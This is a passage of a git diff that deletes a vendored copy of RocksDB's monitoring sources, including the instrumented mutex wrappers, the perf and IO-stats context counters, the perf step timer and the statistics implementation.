-void InstrumentedMutex::Lock() {
-  PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(db_mutex_lock_nanos,
-                                         stats_code_ == DB_MUTEX_WAIT_MICROS);
-  uint64_t wait_time_micros = 0;
-  if (ShouldReportToStats(env_, stats_)) {
-    {
-      StopWatch sw(env_, nullptr, 0, &wait_time_micros);
-      LockInternal();
-    }
-    RecordTick(stats_, stats_code_, wait_time_micros);
-  } else {
-    LockInternal();
-  }
-}
-
-void InstrumentedMutex::LockInternal() {
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_StateDelay(ThreadStatus::STATE_MUTEX_WAIT);
-#endif
-  mutex_.Lock();
-}
-
-void InstrumentedCondVar::Wait() {
-  PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(db_condition_wait_nanos,
-                                         stats_code_ == DB_MUTEX_WAIT_MICROS);
-  uint64_t wait_time_micros = 0;
-  if (ShouldReportToStats(env_, stats_)) {
-    {
-      StopWatch sw(env_, nullptr, 0, &wait_time_micros);
-      WaitInternal();
-    }
-    RecordTick(stats_, stats_code_, wait_time_micros);
-  } else {
-    WaitInternal();
-  }
-}
-
-void InstrumentedCondVar::WaitInternal() {
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_StateDelay(ThreadStatus::STATE_MUTEX_WAIT);
-#endif
-  cond_.Wait();
-}
-
-bool InstrumentedCondVar::TimedWait(uint64_t abs_time_us) {
-  PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(db_condition_wait_nanos,
-                                         stats_code_ == DB_MUTEX_WAIT_MICROS);
-  uint64_t wait_time_micros = 0;
-  bool result = false;
-  if (ShouldReportToStats(env_, stats_)) {
-    {
-      StopWatch sw(env_, nullptr, 0, &wait_time_micros);
-      result = TimedWaitInternal(abs_time_us);
-    }
-    RecordTick(stats_, stats_code_, wait_time_micros);
-  } else {
-    result = TimedWaitInternal(abs_time_us);
-  }
-  return result;
-}
-
-bool InstrumentedCondVar::TimedWaitInternal(uint64_t abs_time_us) {
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_StateDelay(ThreadStatus::STATE_MUTEX_WAIT);
-#endif
-
-  TEST_SYNC_POINT_CALLBACK("InstrumentedCondVar::TimedWaitInternal",
-                           &abs_time_us);
-
-  return cond_.TimedWait(abs_time_us);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/instrumented_mutex.h b/thirdparty/rocksdb/monitoring/instrumented_mutex.h
deleted file mode 100644
index 83d7523..0000000
--- a/thirdparty/rocksdb/monitoring/instrumented_mutex.h
+++ /dev/null
@@ -1,98 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/thread_status.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-class InstrumentedCondVar;
-
-// A wrapper class for port::Mutex that provides additional layer
-// for collecting stats and instrumentation.
-class InstrumentedMutex {
- public:
-  explicit InstrumentedMutex(bool adaptive = false)
-      : mutex_(adaptive), stats_(nullptr), env_(nullptr),
-        stats_code_(0) {}
-
-  InstrumentedMutex(
-      Statistics* stats, Env* env,
-      int stats_code, bool adaptive = false)
-      : mutex_(adaptive), stats_(stats), env_(env),
-        stats_code_(stats_code) {}
-
-  void Lock();
-
-  void Unlock() {
-    mutex_.Unlock();
-  }
-
-  void AssertHeld() {
-    mutex_.AssertHeld();
-  }
-
- private:
-  void LockInternal();
-  friend class InstrumentedCondVar;
-  port::Mutex mutex_;
-  Statistics* stats_;
-  Env* env_;
-  int stats_code_;
-};
-
-// A wrapper class for port::Mutex that provides additional layer
-// for collecting stats and instrumentation.
-class InstrumentedMutexLock {
- public:
-  explicit InstrumentedMutexLock(InstrumentedMutex* mutex) : mutex_(mutex) {
-    mutex_->Lock();
-  }
-
-  ~InstrumentedMutexLock() {
-    mutex_->Unlock();
-  }
-
- private:
-  InstrumentedMutex* const mutex_;
-  InstrumentedMutexLock(const InstrumentedMutexLock&) = delete;
-  void operator=(const InstrumentedMutexLock&) = delete;
-};
-
-class InstrumentedCondVar {
- public:
-  explicit InstrumentedCondVar(InstrumentedMutex* instrumented_mutex)
-      : cond_(&(instrumented_mutex->mutex_)),
-        stats_(instrumented_mutex->stats_),
-        env_(instrumented_mutex->env_),
-        stats_code_(instrumented_mutex->stats_code_) {}
-
-  void Wait();
-
-  bool TimedWait(uint64_t abs_time_us);
-
-  void Signal() {
-    cond_.Signal();
-  }
-
-  void SignalAll() {
-    cond_.SignalAll();
-  }
-
- private:
-  void WaitInternal();
-  bool TimedWaitInternal(uint64_t abs_time_us);
-  port::CondVar cond_;
-  Statistics* stats_;
-  Env* env_;
-  int stats_code_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/iostats_context.cc b/thirdparty/rocksdb/monitoring/iostats_context.cc
deleted file mode 100644
index 8aa131a..0000000
--- a/thirdparty/rocksdb/monitoring/iostats_context.cc
+++ /dev/null
@@ -1,61 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <sstream>
-#include "monitoring/iostats_context_imp.h"
-#include "rocksdb/env.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread IOStatsContext iostats_context;
-#endif
-
-IOStatsContext* get_iostats_context() {
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  return &iostats_context;
-#else
-  return nullptr;
-#endif
-}
-
-void IOStatsContext::Reset() {
-  thread_pool_id = Env::Priority::TOTAL;
-  bytes_read = 0;
-  bytes_written = 0;
-  open_nanos = 0;
-  allocate_nanos = 0;
-  write_nanos = 0;
-  read_nanos = 0;
-  range_sync_nanos = 0;
-  prepare_write_nanos = 0;
-  fsync_nanos = 0;
-  logger_nanos = 0;
-}
-
-#define IOSTATS_CONTEXT_OUTPUT(counter)         \
-  if (!exclude_zero_counters || counter > 0) {  \
-    ss << #counter << " = " << counter << ", "; \
-  }
-
-std::string IOStatsContext::ToString(bool exclude_zero_counters) const {
-  std::ostringstream ss;
-  IOSTATS_CONTEXT_OUTPUT(thread_pool_id);
-  IOSTATS_CONTEXT_OUTPUT(bytes_read);
-  IOSTATS_CONTEXT_OUTPUT(bytes_written);
-  IOSTATS_CONTEXT_OUTPUT(open_nanos);
-  IOSTATS_CONTEXT_OUTPUT(allocate_nanos);
-  IOSTATS_CONTEXT_OUTPUT(write_nanos);
-  IOSTATS_CONTEXT_OUTPUT(read_nanos);
-  IOSTATS_CONTEXT_OUTPUT(range_sync_nanos);
-  IOSTATS_CONTEXT_OUTPUT(fsync_nanos);
-  IOSTATS_CONTEXT_OUTPUT(prepare_write_nanos);
-  IOSTATS_CONTEXT_OUTPUT(logger_nanos);
-
-  return ss.str();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/iostats_context_imp.h b/thirdparty/rocksdb/monitoring/iostats_context_imp.h
deleted file mode 100644
index 8853829..0000000
--- a/thirdparty/rocksdb/monitoring/iostats_context_imp.h
+++ /dev/null
@@ -1,54 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/perf_step_timer.h"
-#include "rocksdb/iostats_context.h"
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-
-// increment a specific counter by the specified value
-#define IOSTATS_ADD(metric, value)     \
-  (get_iostats_context()->metric += value)
-
-// Increase metric value only when it is positive
-#define IOSTATS_ADD_IF_POSITIVE(metric, value)   \
-  if (value > 0) { IOSTATS_ADD(metric, value); }
-
-// reset a specific counter to zero
-#define IOSTATS_RESET(metric)          \
-  (get_iostats_context()->metric = 0)
-
-// reset all counters to zero
-#define IOSTATS_RESET_ALL()                        \
-  (get_iostats_context()->Reset())
-
-#define IOSTATS_SET_THREAD_POOL_ID(value)      \
-  (get_iostats_context()->thread_pool_id = value)
-
-#define IOSTATS_THREAD_POOL_ID()               \
-  (get_iostats_context()->thread_pool_id)
-
-#define IOSTATS(metric)                        \
-  (get_iostats_context()->metric)
-
-// Declare and set start time of the timer
-#define IOSTATS_TIMER_GUARD(metric)                                          \
-  PerfStepTimer iostats_step_timer_##metric(&(get_iostats_context()->metric)); \
-  iostats_step_timer_##metric.Start();
-
-#else  // ROCKSDB_SUPPORT_THREAD_LOCAL
-
-#define IOSTATS_ADD(metric, value)
-#define IOSTATS_ADD_IF_POSITIVE(metric, value)
-#define IOSTATS_RESET(metric)
-#define IOSTATS_RESET_ALL()
-#define IOSTATS_SET_THREAD_POOL_ID(value)
-#define IOSTATS_THREAD_POOL_ID()
-#define IOSTATS(metric) 0
-
-#define IOSTATS_TIMER_GUARD(metric)
-
-#endif  // ROCKSDB_SUPPORT_THREAD_LOCAL
diff --git a/thirdparty/rocksdb/monitoring/iostats_context_test.cc b/thirdparty/rocksdb/monitoring/iostats_context_test.cc
deleted file mode 100644
index 74d3e43..0000000
--- a/thirdparty/rocksdb/monitoring/iostats_context_test.cc
+++ /dev/null
@@ -1,29 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/iostats_context.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-TEST(IOStatsContextTest, ToString) {
-  get_iostats_context()->Reset();
-  get_iostats_context()->bytes_read = 12345;
-
-  std::string zero_included = get_iostats_context()->ToString();
-  ASSERT_NE(std::string::npos, zero_included.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_included.find("= 12345"));
-
-  std::string zero_excluded = get_iostats_context()->ToString(true);
-  ASSERT_EQ(std::string::npos, zero_excluded.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_excluded.find("= 12345"));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/perf_context.cc b/thirdparty/rocksdb/monitoring/perf_context.cc
deleted file mode 100644
index 791f4bd..0000000
--- a/thirdparty/rocksdb/monitoring/perf_context.cc
+++ /dev/null
@@ -1,185 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include <sstream>
-#include "monitoring/perf_context_imp.h"
-
-namespace rocksdb {
-
-#if defined(NPERF_CONTEXT) || !defined(ROCKSDB_SUPPORT_THREAD_LOCAL)
-PerfContext perf_context;
-#else
-#if defined(OS_SOLARIS)
-__thread PerfContext perf_context_;
-#else
-__thread PerfContext perf_context;
-#endif
-#endif
-
-PerfContext* get_perf_context() {
-#if defined(NPERF_CONTEXT) || !defined(ROCKSDB_SUPPORT_THREAD_LOCAL)
-  return &perf_context;
-#else
-#if defined(OS_SOLARIS)
-  return &perf_context_;
-#else
-  return &perf_context;
-#endif
-#endif
-}
-
-void PerfContext::Reset() {
-#ifndef NPERF_CONTEXT
-  user_key_comparison_count = 0;
-  block_cache_hit_count = 0;
-  block_read_count = 0;
-  block_read_byte = 0;
-  block_read_time = 0;
-  block_checksum_time = 0;
-  block_decompress_time = 0;
-  get_read_bytes = 0;
-  multiget_read_bytes = 0;
-  iter_read_bytes = 0;
-  internal_key_skipped_count = 0;
-  internal_delete_skipped_count = 0;
-  internal_recent_skipped_count = 0;
-  internal_merge_count = 0;
-  write_wal_time = 0;
-
-  get_snapshot_time = 0;
-  get_from_memtable_time = 0;
-  get_from_memtable_count = 0;
-  get_post_process_time = 0;
-  get_from_output_files_time = 0;
-  seek_on_memtable_time = 0;
-  seek_on_memtable_count = 0;
-  next_on_memtable_count = 0;
-  prev_on_memtable_count = 0;
-  seek_child_seek_time = 0;
-  seek_child_seek_count = 0;
-  seek_min_heap_time = 0;
-  seek_internal_seek_time = 0;
-  find_next_user_entry_time = 0;
-  write_pre_and_post_process_time = 0;
-  write_memtable_time = 0;
-  write_delay_time = 0;
-  db_mutex_lock_nanos = 0;
-  db_condition_wait_nanos = 0;
-  merge_operator_time_nanos = 0;
-  read_index_block_nanos = 0;
-  read_filter_block_nanos = 0;
-  new_table_block_iter_nanos = 0;
-  new_table_iterator_nanos = 0;
-  block_seek_nanos = 0;
-  find_table_nanos = 0;
-  bloom_memtable_hit_count = 0;
-  bloom_memtable_miss_count = 0;
-  bloom_sst_hit_count = 0;
-  bloom_sst_miss_count = 0;
-
-  env_new_sequential_file_nanos = 0;
-  env_new_random_access_file_nanos = 0;
-  env_new_writable_file_nanos = 0;
-  env_reuse_writable_file_nanos = 0;
-  env_new_random_rw_file_nanos = 0;
-  env_new_directory_nanos = 0;
-  env_file_exists_nanos = 0;
-  env_get_children_nanos = 0;
-  env_get_children_file_attributes_nanos = 0;
-  env_delete_file_nanos = 0;
-  env_create_dir_nanos = 0;
-  env_create_dir_if_missing_nanos = 0;
-  env_delete_dir_nanos = 0;
-  env_get_file_size_nanos = 0;
-  env_get_file_modification_time_nanos = 0;
-  env_rename_file_nanos = 0;
-  env_link_file_nanos = 0;
-  env_lock_file_nanos = 0;
-  env_unlock_file_nanos = 0;
-  env_new_logger_nanos = 0;
-#endif
-}
-
-#define PERF_CONTEXT_OUTPUT(counter)             \
-  if (!exclude_zero_counters || (counter > 0)) { \
-    ss << #counter << " = " << counter << ", ";  \
-  }
-
-std::string PerfContext::ToString(bool exclude_zero_counters) const {
-#ifdef NPERF_CONTEXT
-  return "";
-#else
-  std::ostringstream ss;
-  PERF_CONTEXT_OUTPUT(user_key_comparison_count);
-  PERF_CONTEXT_OUTPUT(block_cache_hit_count);
-  PERF_CONTEXT_OUTPUT(block_read_count);
-  PERF_CONTEXT_OUTPUT(block_read_byte);
-  PERF_CONTEXT_OUTPUT(block_read_time);
-  PERF_CONTEXT_OUTPUT(block_checksum_time);
-  PERF_CONTEXT_OUTPUT(block_decompress_time);
-  PERF_CONTEXT_OUTPUT(get_read_bytes);
-  PERF_CONTEXT_OUTPUT(multiget_read_bytes);
-  PERF_CONTEXT_OUTPUT(iter_read_bytes);
-  PERF_CONTEXT_OUTPUT(internal_key_skipped_count);
-  PERF_CONTEXT_OUTPUT(internal_delete_skipped_count);
-  PERF_CONTEXT_OUTPUT(internal_recent_skipped_count);
-  PERF_CONTEXT_OUTPUT(internal_merge_count);
-  PERF_CONTEXT_OUTPUT(write_wal_time);
-  PERF_CONTEXT_OUTPUT(get_snapshot_time);
-  PERF_CONTEXT_OUTPUT(get_from_memtable_time);
-  PERF_CONTEXT_OUTPUT(get_from_memtable_count);
-  PERF_CONTEXT_OUTPUT(get_post_process_time);
-  PERF_CONTEXT_OUTPUT(get_from_output_files_time);
-  PERF_CONTEXT_OUTPUT(seek_on_memtable_time);
-  PERF_CONTEXT_OUTPUT(seek_on_memtable_count);
-  PERF_CONTEXT_OUTPUT(next_on_memtable_count);
-  PERF_CONTEXT_OUTPUT(prev_on_memtable_count);
-  PERF_CONTEXT_OUTPUT(seek_child_seek_time);
-  PERF_CONTEXT_OUTPUT(seek_child_seek_count);
-  PERF_CONTEXT_OUTPUT(seek_min_heap_time);
-  PERF_CONTEXT_OUTPUT(seek_internal_seek_time);
-  PERF_CONTEXT_OUTPUT(find_next_user_entry_time);
-  PERF_CONTEXT_OUTPUT(write_pre_and_post_process_time);
-  PERF_CONTEXT_OUTPUT(write_memtable_time);
-  PERF_CONTEXT_OUTPUT(db_mutex_lock_nanos);
-  PERF_CONTEXT_OUTPUT(db_condition_wait_nanos);
-  PERF_CONTEXT_OUTPUT(merge_operator_time_nanos);
-  PERF_CONTEXT_OUTPUT(write_delay_time);
-  PERF_CONTEXT_OUTPUT(read_index_block_nanos);
-  PERF_CONTEXT_OUTPUT(read_filter_block_nanos);
-  PERF_CONTEXT_OUTPUT(new_table_block_iter_nanos);
-  PERF_CONTEXT_OUTPUT(new_table_iterator_nanos);
-  PERF_CONTEXT_OUTPUT(block_seek_nanos);
-  PERF_CONTEXT_OUTPUT(find_table_nanos);
-  PERF_CONTEXT_OUTPUT(bloom_memtable_hit_count);
-  PERF_CONTEXT_OUTPUT(bloom_memtable_miss_count);
-  PERF_CONTEXT_OUTPUT(bloom_sst_hit_count);
-  PERF_CONTEXT_OUTPUT(bloom_sst_miss_count);
-  PERF_CONTEXT_OUTPUT(env_new_sequential_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_random_access_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_writable_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_reuse_writable_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_random_rw_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_directory_nanos);
-  PERF_CONTEXT_OUTPUT(env_file_exists_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_children_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_children_file_attributes_nanos);
-  PERF_CONTEXT_OUTPUT(env_delete_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_create_dir_nanos);
-  PERF_CONTEXT_OUTPUT(env_create_dir_if_missing_nanos);
-  PERF_CONTEXT_OUTPUT(env_delete_dir_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_file_size_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_file_modification_time_nanos);
-  PERF_CONTEXT_OUTPUT(env_rename_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_link_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_lock_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_unlock_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_logger_nanos);
-  return ss.str();
-#endif
-}
-
-}
diff --git a/thirdparty/rocksdb/monitoring/perf_context_imp.h b/thirdparty/rocksdb/monitoring/perf_context_imp.h
deleted file mode 100644
index 421a8ce..0000000
--- a/thirdparty/rocksdb/monitoring/perf_context_imp.h
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/perf_step_timer.h"
-#include "rocksdb/perf_context.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-#if defined(NPERF_CONTEXT)
-
-#define PERF_TIMER_GUARD(metric)
-#define PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(metric, condition)
-#define PERF_TIMER_MEASURE(metric)
-#define PERF_TIMER_STOP(metric)
-#define PERF_TIMER_START(metric)
-#define PERF_COUNTER_ADD(metric, value)
-
-#else
-
-// Stop the timer and update the metric
-#define PERF_TIMER_STOP(metric) perf_step_timer_##metric.Stop();
-
-#define PERF_TIMER_START(metric) perf_step_timer_##metric.Start();
-
-// Declare and set start time of the timer
-#define PERF_TIMER_GUARD(metric)                                       \
-  PerfStepTimer perf_step_timer_##metric(&(get_perf_context()->metric)); \
-  perf_step_timer_##metric.Start();
-
-#define PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(metric, condition)            \
-  PerfStepTimer perf_step_timer_##metric(&(get_perf_context()->metric), true); \
-  if ((condition)) {                                                         \
-    perf_step_timer_##metric.Start();                                        \
-  }
-
-// Update metric with time elapsed since last START. start time is reset
-// to current timestamp.
-#define PERF_TIMER_MEASURE(metric) perf_step_timer_##metric.Measure();
-
-// Increase metric value
-#define PERF_COUNTER_ADD(metric, value)        \
-  if (perf_level >= PerfLevel::kEnableCount) { \
-    get_perf_context()->metric += value;       \
-  }
-
-#endif
-
-}
diff --git a/thirdparty/rocksdb/monitoring/perf_level.cc b/thirdparty/rocksdb/monitoring/perf_level.cc
deleted file mode 100644
index 79c718c..0000000
--- a/thirdparty/rocksdb/monitoring/perf_level.cc
+++ /dev/null
@@ -1,28 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include <assert.h>
-#include "monitoring/perf_level_imp.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread PerfLevel perf_level = kEnableCount;
-#else
-PerfLevel perf_level = kEnableCount;
-#endif
-
-void SetPerfLevel(PerfLevel level) {
-  assert(level > kUninitialized);
-  assert(level < kOutOfBounds);
-  perf_level = level;
-}
-
-PerfLevel GetPerfLevel() {
-  return perf_level;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/perf_level_imp.h b/thirdparty/rocksdb/monitoring/perf_level_imp.h
deleted file mode 100644
index 2a3add1..0000000
--- a/thirdparty/rocksdb/monitoring/perf_level_imp.h
+++ /dev/null
@@ -1,18 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "rocksdb/perf_level.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-extern __thread PerfLevel perf_level;
-#else
-extern PerfLevel perf_level;
-#endif
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/perf_step_timer.h b/thirdparty/rocksdb/monitoring/perf_step_timer.h
deleted file mode 100644
index 4cb48b1..0000000
--- a/thirdparty/rocksdb/monitoring/perf_step_timer.h
+++ /dev/null
@@ -1,54 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/perf_level_imp.h"
-#include "rocksdb/env.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-class PerfStepTimer {
- public:
-  explicit PerfStepTimer(uint64_t* metric, bool for_mutex = false)
-      : enabled_(perf_level >= PerfLevel::kEnableTime ||
-                 (!for_mutex && perf_level >= kEnableTimeExceptForMutex)),
-        env_(enabled_ ? Env::Default() : nullptr),
-        start_(0),
-        metric_(metric) {}
-
-  ~PerfStepTimer() {
-    Stop();
-  }
-
-  void Start() {
-    if (enabled_) {
-      start_ = env_->NowNanos();
-    }
-  }
-
-  void Measure() {
-    if (start_) {
-      uint64_t now = env_->NowNanos();
-      *metric_ += now - start_;
-      start_ = now;
-    }
-  }
-
-  void Stop() {
-    if (start_) {
-      *metric_ += env_->NowNanos() - start_;
-      start_ = 0;
-    }
-  }
-
- private:
-  const bool enabled_;
-  Env* const env_;
-  uint64_t start_;
-  uint64_t* metric_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/statistics.cc b/thirdparty/rocksdb/monitoring/statistics.cc
deleted file mode 100644
index 9387043..0000000
--- a/thirdparty/rocksdb/monitoring/statistics.cc
+++ /dev/null
@@ -1,191 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "monitoring/statistics.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include "rocksdb/statistics.h"
-#include "port/likely.h"
-#include <algorithm>
-#include <cstdio>
-
-namespace rocksdb {
-
-std::shared_ptr<Statistics> CreateDBStatistics() {
-  return std::make_shared<StatisticsImpl>(nullptr, false);
-}
-
-StatisticsImpl::StatisticsImpl(std::shared_ptr<Statistics> stats,
-                               bool enable_internal_stats)
-    : stats_(std::move(stats)), enable_internal_stats_(enable_internal_stats) {}
-
-StatisticsImpl::~StatisticsImpl() {}
-
-uint64_t StatisticsImpl::getTickerCount(uint32_t tickerType) const {
-  MutexLock lock(&aggregate_lock_);
-  return getTickerCountLocked(tickerType);
-}
-
-uint64_t StatisticsImpl::getTickerCountLocked(uint32_t tickerType) const {
-  assert(
-    enable_internal_stats_ ?
-      tickerType < INTERNAL_TICKER_ENUM_MAX :
-      tickerType < TICKER_ENUM_MAX);
-  uint64_t res = 0;
-  for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-    res += per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType];
-  }
-  return res;
-}
-
-void StatisticsImpl::histogramData(uint32_t histogramType,
-                                   HistogramData* const data) const {
-  MutexLock lock(&aggregate_lock_);
-  getHistogramImplLocked(histogramType)->Data(data);
-}
-
-std::unique_ptr<HistogramImpl> StatisticsImpl::getHistogramImplLocked(
-    uint32_t histogramType) const {
-  assert(
-    enable_internal_stats_ ?
-      histogramType < INTERNAL_HISTOGRAM_ENUM_MAX :
-      histogramType < HISTOGRAM_ENUM_MAX);
-  std::unique_ptr<HistogramImpl> res_hist(new HistogramImpl());
-  for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-    res_hist->Merge(
-        per_core_stats_.AccessAtCore(core_idx)->histograms_[histogramType]);
-  }
-  return res_hist;
-}
-
-std::string StatisticsImpl::getHistogramString(uint32_t histogramType) const {
-  MutexLock lock(&aggregate_lock_);
-  return getHistogramImplLocked(histogramType)->ToString();
-}
-
-void StatisticsImpl::setTickerCount(uint32_t tickerType, uint64_t count) {
-  {
-    MutexLock lock(&aggregate_lock_);
-    setTickerCountLocked(tickerType, count);
-  }
-  if (stats_ && tickerType < TICKER_ENUM_MAX) {
-    stats_->setTickerCount(tickerType, count);
-  }
-}
-
-void StatisticsImpl::setTickerCountLocked(uint32_t tickerType, uint64_t count) {
-  assert(enable_internal_stats_ ? tickerType < INTERNAL_TICKER_ENUM_MAX
-                                : tickerType < TICKER_ENUM_MAX);
-  for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-    if (core_idx == 0) {
-      per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType] = count;
-    } else {
-      per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType] = 0;
-    }
-  }
-}
-
-uint64_t StatisticsImpl::getAndResetTickerCount(uint32_t tickerType) {
-  uint64_t sum = 0;
-  {
-    MutexLock lock(&aggregate_lock_);
-    assert(enable_internal_stats_ ? tickerType < INTERNAL_TICKER_ENUM_MAX
-                                  : tickerType < TICKER_ENUM_MAX);
-    for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-      sum +=
-          per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType].exchange(
-              0, std::memory_order_relaxed);
-    }
-  }
-  if (stats_ && tickerType < TICKER_ENUM_MAX) {
-    stats_->setTickerCount(tickerType, 0);
-  }
-  return sum;
-}
-
-void StatisticsImpl::recordTick(uint32_t tickerType, uint64_t count) {
-  assert(
-    enable_internal_stats_ ?
-      tickerType < INTERNAL_TICKER_ENUM_MAX :
-      tickerType < TICKER_ENUM_MAX);
-  per_core_stats_.Access()->tickers_[tickerType].fetch_add(
-      count, std::memory_order_relaxed);
-  if (stats_ && tickerType < TICKER_ENUM_MAX) {
-    stats_->recordTick(tickerType, count);
-  }
-}
-
-void StatisticsImpl::measureTime(uint32_t histogramType, uint64_t value) {
-  assert(
-    enable_internal_stats_ ?
-      histogramType < INTERNAL_HISTOGRAM_ENUM_MAX :
-      histogramType < HISTOGRAM_ENUM_MAX);
-  per_core_stats_.Access()->histograms_[histogramType].Add(value);
-  if (stats_ && histogramType < HISTOGRAM_ENUM_MAX) {
-    stats_->measureTime(histogramType, value);
-  }
-}
-
-Status StatisticsImpl::Reset() {
-  MutexLock lock(&aggregate_lock_);
-  for (uint32_t i = 0; i < TICKER_ENUM_MAX; ++i) {
-    setTickerCountLocked(i, 0);
-  }
-  for (uint32_t i = 0; i < HISTOGRAM_ENUM_MAX; ++i) {
-    for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-      per_core_stats_.AccessAtCore(core_idx)->histograms_[i].Clear();
-    }
-  }
-  return Status::OK();
-}
-
-namespace {
-
-// a buffer size used for temp string buffers
-const int kTmpStrBufferSize = 200;
-
-} // namespace
-
-std::string StatisticsImpl::ToString() const {
-  MutexLock lock(&aggregate_lock_);
-  std::string res;
-  res.reserve(20000);
-  for (const auto& t : TickersNameMap) {
-    if (t.first < TICKER_ENUM_MAX || enable_internal_stats_) {
-      char buffer[kTmpStrBufferSize];
-      snprintf(buffer, kTmpStrBufferSize, "%s COUNT : %" PRIu64 "\n",
-               t.second.c_str(), getTickerCountLocked(t.first));
-      res.append(buffer);
-    }
-  }
-  for (const auto& h : HistogramsNameMap) {
-    if (h.first < HISTOGRAM_ENUM_MAX || enable_internal_stats_) {
-      char buffer[kTmpStrBufferSize];
-      HistogramData hData;
-      getHistogramImplLocked(h.first)->Data(&hData);
-      snprintf(
-          buffer, kTmpStrBufferSize,
